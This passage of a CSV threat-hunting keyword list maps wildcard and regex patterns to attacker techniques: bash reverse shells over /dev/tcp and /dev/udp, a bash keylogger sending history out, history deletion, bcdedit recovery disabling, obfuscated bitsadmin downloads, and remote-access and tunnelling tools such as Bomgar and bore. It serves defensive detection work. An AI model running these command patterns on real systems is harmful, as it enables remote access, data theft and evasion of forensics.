Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*HISTORY=/dev/null*",".{0,1000}HISTORY\=\/dev\/null.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. 
","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*ln -sf /dev/null *bash_history*",".{0,1000}ln\s\-sf\s\/dev\/null\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*",".{0,1000}PROMPT_COMMAND\=.{0,1000}history\s\-a.{0,1000}\stail\s.{0,1000}\.bash_history\s\>\s\/dev\/tcp\/127\.0\.0\.1\/.{0,1000}","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*rm /home/*/.bash_history*",".{0,1000}rm\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*rm /root/.bash_history*",".{0,1000}rm\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*set history +o*",".{0,1000}set\shistory\s\+o.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*sh >/dev/tcp/* <&1 2>&1*",".{0,1000}sh\s\>\/dev\/tcp\/.{0,1000}\s\<\&1\s2\>\&1.{0,1000}","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*sh -i >& /dev/udp/*/* 
0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*truncate -s0 *bash_history'*",".{0,1000}truncate\s\-s0\s.{0,1000}bash_history\'.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*",".{0,1000}history\s\-a.{0,1000}\stail\s\-n1\s\~\/\.bash_history\s\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation 
tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*for i in {1..65535}*",".{0,1000}for\si\sin\s\{1\.\.65535\}.{0,1000}","greyware_tool_keyword","bash port scan","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*https://bashupload.com*",".{0,1000}https\:\/\/bashupload\.com.{0,1000}","greyware_tool_keyword","bashupload.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*bcdedit /set {default} bootstatuspolicy ignoreallfailures*",".{0,1000}bcdedit\s\/set\s\{default\}\sbootstatuspolicy\signoreallfailures.{0,1000}","greyware_tool_keyword","bcdedit","changes the boot status policy to ignore all failures","T1490","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bcdedit /set {default} recoveryenabled No*",".{0,1000}bcdedit\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","greyware_tool_keyword","bcdedit","disables Windows automatic recovery","T1490","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bcdedit* /set {default} bootstatuspolicy 
ignoreallfailures*",".{0,1000}bcdedit.{0,1000}\s\/set\s\{default\}\sbootstatuspolicy\signoreallfailures.{0,1000}","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1542.003 - T1112 - T1484.001","TA0005 - TA0040?","N/A","LockBit - Snatch - Hive - Zola","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bcdedit* /set {default} recoveryenabled No*",".{0,1000}bcdedit.{0,1000}\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. 
adversaries can evade detection and potentially maintain access to the system even after reboots.","T1542.003 - T1112 - T1484.001","TA0005 - TA0040?","N/A","LockBit - Snatch - Hive - Zola","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*FOR /F ""tokens=1,2*"" %%V IN ('bcdedit') DO SET adminTest=%%V*",".{0,1000}FOR\s\/F\s\""tokens\=1,2.{0,1000}\""\s\%\%V\sIN\s\(\'bcdedit\'\)\sDO\sSET\sadminTest\=\%\%V.{0,1000}","greyware_tool_keyword","bcedit","This checks whether the script has administrative access before continuing","T1070.003","TA0005","N/A","N/A","Defense Evasion","https://github.com/Lifka/hacking-resources/blob/7885f95676c3ba4b2ee79fbaf0f6797add892322/system-hacking-cheat-sheet.md?plain=1#L114","1","0","N/A","N/A","6","10","1836","169","2024-06-25T18:58:59Z","2021-02-27T10:17:42Z" "*https://*.free.beeceptor.com*",".{0,1000}https\:\/\/.{0,1000}\.free\.beeceptor\.com.{0,1000}","greyware_tool_keyword","beeceptor.com","temporary public URL for your localhost + port combination - ideal for real-time testing - can be abused for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://beeceptor.com/local-tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*npgimkapccfidfkfoklhpkgmhgfejhbj*",".{0,1000}npgimkapccfidfkfoklhpkgmhgfejhbj.{0,1000}","greyware_tool_keyword","BelkaVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ficajfeojakddincjafebjmfiefcmanc*",".{0,1000}ficajfeojakddincjafebjmfiefcmanc.{0,1000}","greyware_tool_keyword","Best VPN USA","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - 
TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*binwalk*",".{0,1000}binwalk.{0,1000}","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation tool","https://github.com/ReFirmLabs/binwalk","1","0","N/A","greyware tool - risks of False positive !","N/A","10","10509","1509","2024-04-30T10:01:01Z","2013-11-15T20:45:40Z" "*b^i^t^s^a^d^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d*",".{0,1000}b\^i\^t\^s\^a\^d\^min\^\s\/t\^ra\^n\^s\^f\^e\^r\^\s\^\/\^d\^o\^w\^n\^l\^o\^a\^d.{0,1000}","greyware_tool_keyword","bitsadmin","bitsadmin obfuscation observed used by attackers","T1105 - T1071","TA0010 - TA0011 - TA0009 - TA00005","N/A","Black Basta - Hive - Revil - Conti - Medusa","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll",".{0,1000}bitsadmin\s\/transfer\sdebjob\s\/download\s\/priority\snormal\s\\.{0,1000}\\C\$\\Windows\\.{0,1000}\.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","Black Basta - Hive - Revil - Conti - Medusa","Exploitation tool","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*\BitTorrent.exe*",".{0,1000}\\BitTorrent\.exe.{0,1000}","greyware_tool_keyword","bittorent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in an enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Data Exfiltration","https[://]www[.]bittorrent.com/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*neo4j console*",".{0,1000}neo4j\sconsole.{0,1000}","greyware_tool_keyword","BloodHound","The neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - Chimera - TA505","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","greyware tool - risks of False positive !","10","10","1878","321","2024-07-26T20:07:25Z","2018-02-26T14:44:20Z" "*.beyondtrustcloud.com/session_complete*",".{0,1000}\.beyondtrustcloud\.com\/session_complete.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/bomgar-rep.exe*",".{0,1000}\/bomgar\-rep\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/bomgar-rep-installer.exe*",".{0,1000}\/bomgar\-rep\-installer\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/bomgar-scc-*.exe*",".{0,1000}\/bomgar\-scc\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/bomgar-scc.exe*",".{0,1000}\/bomgar\-scc\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\appdata\local\bomgar\bomgar-rep\*",".{0,1000}\\appdata\\local\\bomgar\\bomgar\-rep\\.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Bomgar-enum_cp-*",".{0,1000}\\Bomgar\-enum_cp\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bomgar-rep.cache\*",".{0,1000}\\bomgar\-rep\.cache\\.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bomgar-rep.exe*",".{0,1000}\\bomgar\-rep\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\bomgar-rep-installer.exe*",".{0,1000}\\bomgar\-rep\-installer\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bomgar-scc-*.exe*",".{0,1000}\\bomgar\-scc\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\bomgar-scc.exe*",".{0,1000}\\bomgar\-scc\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\BOMGAR-SCC.EXE-*",".{0,1000}\\BOMGAR\-SCC\.EXE\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\cbhook-x86.dll*",".{0,1000}\\cbhook\-x86\.dll.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Run\Bomgar Support Reconnect*",".{0,1000}\\CurrentVersion\\Run\\Bomgar\sSupport\sReconnect.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\CurrentVersion\Uninstall\Representative Console [eval-*",".{0,1000}\\CurrentVersion\\Uninstall\\Representative\sConsole\s\[eval\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\embedhook-x64.exe*",".{0,1000}\\embedhook\-x64\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\embedhook-x86.exe*",".{0,1000}\\embedhook\-x86\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\programdata\bomgar-scc-*",".{0,1000}\\programdata\\bomgar\-scc\-.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Bomgar Corporation*","\>Bomgar\sCorporation\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Remote Support Customer Client*",".{0,1000}\>Remote\sSupport\sCustomer\sClient\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Representative Console*",".{0,1000}\>Representative\sConsole\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*beyondtrustcloud.com\Software\Qt6*",".{0,1000}beyondtrustcloud\.com\\Software\\Qt6.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bomgar-rdp.exe*",".{0,1000}bomgar\-rdp\.exe.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Company'>BeyondTrust*",".{0,1000}\'Company\'\>BeyondTrust\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Company'>bomgar*",".{0,1000}\'Company\'\>bomgar\<\/Data\>.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*eval-*.beyondtrustcloud.com*",".{0,1000}eval\-.{0,1000}\.beyondtrustcloud\.com.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 
- TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*license.bomgar.com*",".{0,1000}license\.bomgar\.com.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'TaskName'>\Bomgar Task *",".{0,1000}\'TaskName\'\>\\Bomgar\sTask\s.{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*To: All Representatives From: Remote Support * has added a note to this session.*",".{0,1000}To\:\sAll\sRepresentatives\s\sFrom\:\sRemote\sSupport\s.{0,1000}\shas\sadded\sa\snote\sto\sthis\ssession\..{0,1000}","greyware_tool_keyword","Bomgar","Bomgar beyoundtrust Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.beyondtrust.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* install bore-cli*",".{0,1000}\sinstall\sbore\-cli.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "* --to bore.pub*",".{0,1000}\s\-\-to\sbore\.pub.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","N/A","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" 
"*02006756198c02904d534aa215a4382f39b9f182e6fed9d7c2bbb36f3e2c06f6*",".{0,1000}02006756198c02904d534aa215a4382f39b9f182e6fed9d7c2bbb36f3e2c06f6.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*079ba7d752899ae9635cc444d27479b0cd314a39a282d114e9940a26fb9f55e7*",".{0,1000}079ba7d752899ae9635cc444d27479b0cd314a39a282d114e9940a26fb9f55e7.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*0c2294231827539891a70bd5b7657c7d1d87f53d13f2c609a32f49ca54440797*",".{0,1000}0c2294231827539891a70bd5b7657c7d1d87f53d13f2c609a32f49ca54440797.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*24328a6907e7d2783be6817bdd1c2ca6c14aa1cb556caff0e193af56e799ff1a*",".{0,1000}24328a6907e7d2783be6817bdd1c2ca6c14aa1cb556caff0e193af56e799ff1a.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*2b5d0530f54a5cb1aa7e037ab075ba27991bafa83a42555d50fde9245a3eb435*",".{0,1000}2b5d0530f54a5cb1aa7e037ab075ba27991bafa83a42555d50fde9245a3eb435.{0,1000}","greyware_tool_keyword","bore","bore is a simple 
CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*32dc4748174790882d0d962dd7b5a6bf332cb8cd6c8ccf8d75d9ec5cd703274a*",".{0,1000}32dc4748174790882d0d962dd7b5a6bf332cb8cd6c8ccf8d75d9ec5cd703274a.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" "*33de7cf074cc9aa8850b99ef61fb64e490cdf04f0231d76988b207b3d09cbdae*",".{0,1000}33de7cf074cc9aa8850b99ef61fb64e490cdf04f0231d76988b207b3d09cbdae.{0,1000}","greyware_tool_keyword","bore","bore is a simple CLI tool for making tunnels to localhost","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/ekzhang/bore","1","0","#filehash","N/A","10","10","8382","333","2024-07-13T20:33:44Z","2022-04-04T02:47:54Z" 